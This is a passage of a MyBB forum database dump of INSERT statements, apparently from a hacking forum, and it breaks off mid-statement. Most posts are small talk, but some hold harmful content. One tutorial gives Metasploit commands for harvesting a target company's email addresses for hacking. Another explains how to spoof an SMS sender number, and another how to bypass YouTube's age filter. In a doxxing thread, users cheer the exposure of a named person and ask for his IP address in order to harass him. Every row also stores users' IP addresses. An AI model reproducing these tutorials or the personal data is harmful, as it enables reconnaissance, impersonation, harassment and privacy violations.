(`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5525', '953', '5367', '34', 'RE: | [ Newbie Guide ] Photoshop Site\'s For Beginners | [ Very Helpful ] |', '0', '82', 'iTzIpod', '1350616951', 'Really? You.. Not knowing any of these websites. Lol Should search more GFX Forums on Google or something.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b2c128cc130167bba5daa7683a00879c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5526', '889', '4842', '3', 'RE: Vote for a new theme', '0', '2', 'Apathy', '1350617464', 'I like 1 alot. Now that I have seen it.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', 'e6a335b5b61fbbb7498518a00ef1e5a8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5527', '907', '4998', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '2', 'Apathy', '1350617582', 'Not bad. I like someone else footage better though.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', '433061927b4fc96b0352d0df0a32301b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5528', '907', '5527', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '3', '??????????¢™', '1350619527', '[quote=\'Apathy\' pid=\'5527\' dateline=\'1350617582\'] Not bad. I like someone else footage better though. [/quote] Thats okay with me, I didnt do a pro edit because im not an editor just a gamer.', '75.22.57.245', '1259747829', '1', '0', '0', '0', '1', '51e2bae20fdb7aebe947fb9e6d0a2506', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5529', '947', '5329', '8', 'RE: GANGNAM STYLE', '0', '205', 'mothered', '1350620394', '[quote=\'?(???)?TREYZ?(???)?\' pid=\'5329\' dateline=\'1350553535\'] gangnam style is so boss who agrees everybody now op op op op op gangnam style , sexy ladies haah lol i saw him live at the x factor lol he such a funny dancer [/quote] I just can\'t get this out of my head. It\'s so catchy. I just missed out on tickets, was hoping to go to the X Factor, but saw It on Channel 7 anyway. How was the live performance? Did It rock the house down?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '226cdc3d8dc048c3b0e66b6d990c98b0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5530', '906', '4982', '42', 'RE: DOX of Kody Maxson', '0', '205', 'mothered', '1350620653', 'Brilliant work mate!! His life Is more or less over now.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '1736249cd1170b87de1e6483a612bebe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5531', '981', '5480', '4', 'RE: Whatsup Holmes.', '0', '205', 'mothered', '1350620727', 'Welcome aboard mate. Enjoy your stay :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '0bfb0d1a06b8d57f02da3afd03710a99', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5532', '872', '5500', '24', 'RE: Windows Updates, who uses It?', '0', '205', 'mothered', '1350620861', '[quote=\'ƒ???????????g\' pid=\'5500\' dateline=\'1350608209\'] fuck windows updates....god its soooooo annoying when it comes up [/quote] Now that\'s good to read. I can show you multiple ways, to \"securely\" disable It, or even better, get rid of It altogether so It never pops up again.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '6df67a113301ec0f2d95680e466efa4b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5533', '984', '0', '7', 'What size pizza can you eat?', '0', '205', 'mothered', '1350621080', 'Greetings LH, So, a simple question, what size pizza can you eat? I have a few friends (yes I do!!), and they share a \"medium\" size pizza between them both (couples). My goodness, I\'d eat the cardboard with It. I always have a large, but when I\'m really hungry (when my stomach Is stuck to my spine), I can eat a \"family size\" How about you guys?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'e52d60340cc6320047e17238cf2381bb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5534', '985', '0', '7', 'World\'s Longest Email Address', '0', '205', 'mothered', '1350621213', 'Hey guys, Here\'s a site whereby you can create a really long email address. Whether you do It for a laugh, or just to annoy someone, It\'s certainly quite cool. Link: http://www.abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijk.com/', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'af63c874035db66b595c4a1f626331ff', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5535', '986', '0', '24', 'What VM do you use and why?', '0', '205', 'mothered', '1350621475', 'Greetz to all, Okay, the commonality between most users, Is to utilize a Virtual Machine for files suspected of malicious content. My usage: To test various Operating Systems, and to also verify If a given CD key Is In fact valid. Preferred VM: Yeah, I know VMWare Workstation Is the pick of the crop, but I like Virtual PC 2007, simply for It\'s user-friendliness, being free of any costs, and overall functionality. You guys?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '1eaa65ffcd090cdf307baf445466514b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5536', '985', '5534', '7', 'RE: World\'s Longest Email Address', '0', '3', '??????????¢™', '1350621657', 'LOL that is some dope shit, If someone were to use it people would be like wtf.', '75.22.57.245', '1259747829', '1', '0', '0', '0', '1', 'd5f8b951ed5e0b60eb0fa5ed983a004e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5537', '889', '4842', '3', 'RE: Vote for a new theme', '0', '1', 't3h jok3r', '1350621838', 'I need new userbars, can someone look for new dark userbars? I guess Theme 1 wins then. Keep voting and once again I need new userbars.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '481c156a161a8a816d48a66561c7925b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5538', '985', '5534', '7', 'RE: World\'s Longest Email Address', '0', '222', 'Exposé', '1350621847', 'Haha Im so gonna signup lmao....this is hilarious', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'c19d1f95d81beaa50d83564808402739', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5539', '984', '5533', '7', 'RE: What size pizza can you eat?', '0', '222', 'Exposé', '1350621916', 'I can usually eat like 5 slices or so before im full. But if i\'m really hungry I can have like a large pizza :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'ee6b77d3d6b313ebbff679b9bb9df5f5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5540', '889', '4842', '3', 'RE: Vote for a new theme', '0', '222', 'Exposé', '1350624447', 'Yeh I\'ll look to see if I can find some. We need a new logo too right?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '338be9a55e571846b7de367f0326c46a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5541', '889', '5540', '3', 'RE: Vote for a new theme', '0', '1', 't3h jok3r', '1350624686', '[quote=\'ƒ???????????g\' pid=\'5540\' dateline=\'1350624447\'] Yeh I\'ll look to see if I can find some. We need a new logo too right? [/quote] Yup but I thought there\'s no need to repeat the obvious. We need a logo too but that will only be handled when the theme becomes public.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4a373dcb85cd64ccffa33ea8a8a9e32b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5542', '987', '0', '13', '[TUT] Using Metasploit to harvest all emails of a website', '0', '258', 'PiXEL^OG', '1350630128', 'When hacking a site or company u need to gather as much information about them as possible which includes their emails so this will be helpful to some :cool: Lets start!! Step 1: http://metasploit.com/download/ Download metasploit here . Choose minimal setup . After installing the metasploit , Open Metasploit Console. Now type the following command [code]use auxiliary/gather/search_email_collector[/code] Then Type [code]set DOMAIN target.com[/code] Remember to replace target.com with your target website u wish to harvest the emails of . Now type [code]exploit[/code] That will then tell the console to execute the command and exploit search engines for finding emails It will automatically search through Google , Big and Yahoo and get you all the mail address assigned to your target domain : [IMG]http://3.bp.blogspot.com/-5Ng2WkTciUQ/TfSK48f-CXI/AAAAAAAAAZQ/yXnC5ioEhl8/s1600/metasploit+auxillary+module+email+harvesting.PNG[/IMG] Well that\'s all Thank you for reading and any questions just leave them in the posts below :)', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '6ade8b4f811fe562ee2186fad7b49994', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5543', '988', '0', '12', '[TUT] Watch +18 Youtube Videos Without an Account', '0', '258', 'PiXEL^OG', '1350630423', '[align=center]Today im gonna show you how to bypass +18 filter that Youtube has in a few simple steps Step 1 On the video you want to view, get the video code from the URL. http://www.youtube.com/watch?v=O07u7KdRVo0 O07u7KdRVo0 would be the video code in this case. Step 2 Now add the video code to the following link: http://www.youtube.com/v/VIDEO CODE HERE?fs=1&amp So basically remove \"VIDEO CODE HERE\" in the previous link and replace it with the video code , it would then look like this : http://www.youtube.com/v/O07u7KdRVo0?fs=1& Step 3 Now, go to that link and you will be able to view it without logging in or being over 18. Dont be beech and say thank you in the comments below if this helped :) [/align]', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '34bb877e2abdac6c72ff1e6832ff3340', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5544', '989', '0', '68', 'Free Proxy script , Make your own Proxy browsing site like Hidemyass!!!', '0', '258', 'PiXEL^OG', '1350630514', 'Today ive got something special for you guys :) With this script you can make your own web proxy browsing site just like Hidemyass or Hideme.ru Its called Glype proxy , its a open source proxy script with many features like : cookies , Admin panel , Themes , IP ban system , Tons of user-agents (you can also use your custom user agent) and a bunch of other stuff im too lazy to list it all You can download this awesome script from their official website : http://www.glype.com/ Basically just upload it to your FTP , go to admin.php and choose username and password and your all done :) Requirements : -Paid hosting -Good bandwidth on web hosting account -cURL and PHP5 Enabled on server NOTE!! : If you are using Free hosting like 000webhost , X10 hosting or BinHoster then THEY WILL DELETE YOUR WEBSITE within 10 days because proxy scripts are not allowed on any free host , THIS SCRIPT WORKS BEST WITH PAID HOSTING!! Well that\'s about it , Say thank you if you liked this to keep the thread alive and yeah have fun with it', '139.190.235.246', '-1950422026', '0', '0', '258', '1350630552', '1', 'cc2d3145eb7780a842da8215cadd127d', '0', '1350630552'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5545', '990', '0', '12', 'How to send free anonymous SMS to your friends mobile phone from you\'re PC', '0', '258', 'PiXEL^OG', '1350630641', 'Wazzup guys its Deltaforce bringing you guys a new awesome post on How to send free anonymous SMS to your friends mobile phone from you\'re PC....hope it helps Tongue And before you ask yes this site allows you to send anonymous text messages from anywhere in the world to anywhere in the world!!!! Just follow these easy steps... 1. Go to http://SMSGlobal.com and register for an account. SMSGlobal allows you to send 25 SMS by default. If you want to send 100 more SMS, enter “WPRESS” (without quotes) in “Promo code” field. Thus, using this promo code, you can send a total of 125 SMS. for new promo codes go to this link : http://www.retailmenot.com/view/smsglobal.com Note: You don’t have to fill and “Affiliate code” field. Leave it blank. 2. You will get a text message informing you about the password. Use this password to login to your account. 3. Hit on “Send SMS to Number” [IMG]http://1.bp.blogspot.com/-oH3RhADFFKI/Tn9UY48MucI/AAAAAAAAAEg/ST1PUVTi2O8/s1600/How-to-send-fake-sms-to-friend.jpg[/IMG] 4. Enter the details as follows: Send SMS To: Your friend’s number whom you want to send fake SMS. Sender ID From: The number from whom the SMS will appear to be sent. The number to be spoofed. Replace your number with any other number. Message: Type your message content. You can leave other fields untouched. Note: For Indian friends, make sure you add “91? before sender and receiver numbers. This is a necessary for efficient working of this hack. 5. Now, hit on “Send SMS” button and your friend will receive the fake SMS which you have sent. Cheers!!! Note: Do not misuse this mobile hack as it can put you in problems. Use it for fun!!! Update: SMSGlobal supports almost all countries and their network providers. You can make sure that your country and network provider is supported using this link. So this was a short tutorial on how to send fake SMS to your friends. I have tried this service with many of my friends and it has worked perfectly for me Say thank you in the comments below :)', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'f1ea2e7457fcbd36f64e46ac8e5c8a77', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5546', '889', '4842', '3', 'RE: Vote for a new theme', '0', '258', 'PiXEL^OG', '1350630779', 'I like the current theme the most <3 please don\'t change it', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '1ed8396fa06b23122a8b80fb8d9c27f2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5547', '984', '5533', '7', 'RE: What size pizza can you eat?', '0', '258', 'PiXEL^OG', '1350630893', 'I usually order a large pizza at pizza hut with a coke , a huge sallad and some garlic bread', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '73041a429600b4b10449f3f4136074b7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5548', '985', '5534', '7', 'RE: World\'s Longest Email Address', '0', '258', 'PiXEL^OG', '1350631058', 'I don\'t see the point in it , this can\'t annoy anyone people just copy and paste so its not like someone\'s gonna bother reading all that Though u can troll people with it..', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '66dcfb0702bb575291e02c72e3cc2544', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5549', '981', '5480', '4', 'RE: Whatsup Holmes.', '0', '258', 'PiXEL^OG', '1350631135', 'Hi there , welcome to LH Enjoy your stay :)', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '8d681e3cffd9e5a67c845c65285949e9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5550', '906', '4982', '42', 'RE: DOX of Kody Maxson', '0', '258', 'PiXEL^OG', '1350631543', 'It would have been better if someone had his IP , then we could really fuck with him , anyone up for the job?', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '8be2a3ee8b77fa6da779d4cfb5324982', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5551', '973', '5454', '19', 'RE: New HF Logo?', '0', '258', 'PiXEL^OG', '1350631823', 'I reported this for Adult content , Don\'t post shit like this again , its against LH rules', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'ded609fd6ed63e1db8c9bfbb4b31998d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5552', '973', '5454', '19', 'RE: New HF Logo?', '0', '62', 'R?????zo?', '1350632273', 'Yes I thought it was going to be a real logo aswell.', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', '38eb20c1f69e7f6ca8f20ebb0a8dc687', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5553', '981', '5480', '4', 'RE: Whatsup Holmes.', '0', '62', 'R?????zo?', '1350632345', 'Welcome to the commumity, and enjoy your stay. Stay active and HQ :)', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', '3ddbad44a0af724b70835a6677539465', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5554', '985', '5534', '7', 'RE: World\'s Longest Email Address', '0', '62', 'R?????zo?', '1350632999', 'Hahah I\'ve heard of this before but I never thought of actually using it haha Like doing buisness, \'whats your paypal?\' Here you go: \'hauabaf@abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijk.com\' haha', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', '210e6a0cc8fb8c89c1e992bb7a980841', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5555', '984', '5533', '7', 'RE: What size pizza can you eat?', '0', '62', 'R?????zo?', '1350633125', 'Large for the win! But only if I\'m really hungry :P', '77.54.39.106', '1295394666', '1', '0', '62', '1350633146', '1', '77569e5f2d2ffc7156aac9913ad93b7b', '0', '1350633146'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5556', '990', '5545', '12', 'RE: How to send free anonymous SMS to your friends mobile phone from you\'re PC', '0', '62', 'R?????zo?', '1350633231', 'Thanks for this, I was looking for something like this or a while :)', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', 'fbf7b1928cfa73290d7a0e376375ce1f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5557', '889', '4842', '3', 'RE: Vote for a new theme', '0', '62', 'R?????zo?', '1350633356', 'Seems like theme 1 wins, but I really like the current one we have :(', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', '376befeadc8b3cd72886dc11ad489995', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5558', '947', '5329', '8', 'RE: GANGNAM STYLE', '0', '62', 'R?????zo?', '1350633465', 'He was a fucking boss! Like always!', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', '9b5fee54057b623da57d8d3c6a430d75', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5559', '972', '5453', '16', 'RE: Social Engineering Package', '0', '62', 'R?????zo?', '1350633583', 'Yeah It looked interesting that\'s why I share it with my SE brothers :)', '77.54.39.106', '1295394666', '1', '0', '62', '1350633623', '1', '5511133629948d01d81cbfc5607cb758', '0', '1350633623'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5560', '971', '5492', '9', 'RE: EASY $250 EACH DAY | \"The Webmaster Method\" | Instant paypal money, no wait', '0', '62', 'R?????zo?', '1350633759', '[quote=\'??zg???g????61\' pid=\'5492\' dateline=\'1350605918\'] Damn thanks a ton Reload, your threads are always HQ (: [/quote] Thanks bro, that kinda comments keeps me motivated :)', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', '51d501f593125df1ef96d68fb7fab85b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5561', '957', '5386', '9', 'RE: | [ Get ] My Mobile Business In A Box | Start Your Own Mobile Business |', '0', '62', 'R?????zo?', '1350633843', 'I will read it carefully and try it out later :)', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', 'b11466e822e3b9941ead3f94e5d55eb5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5562', '936', '5257', '18', 'RE: 4 adf.ly bots with proxygrabber', '0', '62', 'R?????zo?', '1350633926', 'Thanks for this, i will try it out later :) Can this get you banned though?', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', '7347d442c72a78e5458c58e7d8f379a2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5563', '984', '5533', '7', 'RE: What size pizza can you eat?', '0', '53', 'sirchamp', '1350635010', 'Lol. We only have \"normal sized\" and \"Family Pizza\" and the normal Pizza costs like 15 Dollars. Everything is fucking expensive here.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '4d0ebd64a3dfa3b91075de7e572eb926', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5564', '964', '5433', '19', 'RE: [UPDATED] L33T Hacking Skype Resolver', '0', '53', 'sirchamp', '1350635213', 'Thanks alot. I already have one but this one looks even nicer :D', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'df9d02d5930397fcec0d8b3aac5a169e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5565', '896', '5499', '23', 'RE: How to secure your Router', '0', '62', 'R?????zo?', '1350636898', '[quote=\'ƒ???????????g\' pid=\'5499\' dateline=\'1350608178\'] Lmao I could still hack your router but k...:P [/quote] How would you do that?', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', '2a0df3c9de84265b64ebef11a92e6357', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5566', '948', '5336', '74', 'RE: MINECRAFT world download', '0', '62', 'R?????zo?', '1350636958', 'Yeah I can\'t download it for some reason, but looks cool though.', '77.54.39.106', '1295394666', '1', '0', '62', '1350637000', '1', '1ce44437331aff74d1c057741b704d70', '0', '1350637000'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5567', '964', '5433', '19', 'RE: [UPDATED] L33T Hacking Skype Resolver', '0', '62', 'R?????zo?', '1350637084', 'I\'m glad you got it to work, repped you.', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', '4bf4d64e97f5e1050cdf309a0fc10265', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5568', '984', '5533', '7', 'RE: What size pizza can you eat?', '0', '62', 'R?????zo?', '1350638003', 